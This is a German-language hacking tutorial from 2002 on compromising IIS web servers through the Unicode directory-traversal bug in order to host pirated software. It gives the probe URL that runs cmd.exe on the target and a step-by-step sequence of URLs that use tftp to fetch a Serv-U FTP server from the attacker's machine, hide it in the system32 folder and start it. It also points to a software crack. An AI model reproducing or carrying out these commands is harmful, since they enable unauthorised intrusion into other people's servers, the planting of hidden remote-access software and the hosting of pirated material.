IIS Hacking - Wie hacke ich ein IIS Rechner

Einleitung :
Hallo Leutz widmen wir uns einen Langweiligen WareZ Thema ... Wie hacke ich ein IIS Rechner ?

IIS Hacking
also, was braucht man:

1. einen gebugten nt server
2. einen tftp server (programm)
3. servU mit konfigurierter ini oder nen anderen ftp server

wo man das her bekommt:

1. scannen :) es gibt glaub ich auch scanner die nach dem bug scannen,
ich hab bis jetzt noch immer alle zugeschoben bekommen. wie kann man rausfinden
ob der entsprechende nt-server geugt ist? wir nehmen jetzt mal als beispiel die
ip 1.1.1.1. nun öffnest du einen webbrowser und gehst auf die adresse:

http://1.1.1.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

kommt nix hast du pech gehabt. der server ist nicht gebugt. kommt ne dir ausgabe
hast du gück gehabt. dieser server ist gebugt.

2. http://home.t-online.de/home/hanewin/tftp-e.htm

3. http://www.serv-u.com/ - crack bei http://astalavista.box.sk/

vorbereitung:

eine ServerUDemon.exe und ServerUDemon.ini (sollte konfiguriert sein) in ein lokales
verzeichnes. tftp server starten, verzeichniß mit den dateien auf hauptverzeichniß
setzen und lesezugrif geben. eigene ip rausfinden, und aufschreiben. die eigene ip wird
im weiteren als 2.2.2.2 bezeichnet.

vorgang an sich:

mit http://1.1.1.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ über die festplatte
browsen und ein geeignetes dir finden, wo man den server verstecken kann. in unserem fall
nehmen wir c:\winnt\system32. so nun muß ServU auf den server gelangen. das geht über tftp.
einfach diese zeile anpassen und auf dem server ausführen:

http://[ip.des.servers.den.du.hacken.willst]/scripts/..%c0%af../winnt/syste m32/cmd.exe?/c+tftp+-i+[deine.ip]+get+[wo.die.servudaemon.exe.auf.deiner.fe st.platte.liegt]ServUDaemon.exe+c:[wo.es.auf.dem.gehackten.hin.soll]ServUDa emon.exe

und noch die ini:

1.1.1.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+2.2.2.2+get+Se rvUDaemon.ini+c:\winnt\system32\ServUDaemon.ini

jetzt muß der server nur noch gestartet werden. das geht ganz einfach :) einfach die servu exe
ausführen:

1.1.1.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\winnt\system32\Serv UDaemon.exe

so, nun ist der ftp server gestartet. mit servu 3 kann man jetz tnoch fernadministration, o.Ä.
betreiben, auf jedenfall, jetzt ist der distro/pubstro/dump fertig :)


thE_iNviNciblE @ 2002 Dezember on http://www.the-invincible4ever.de.vu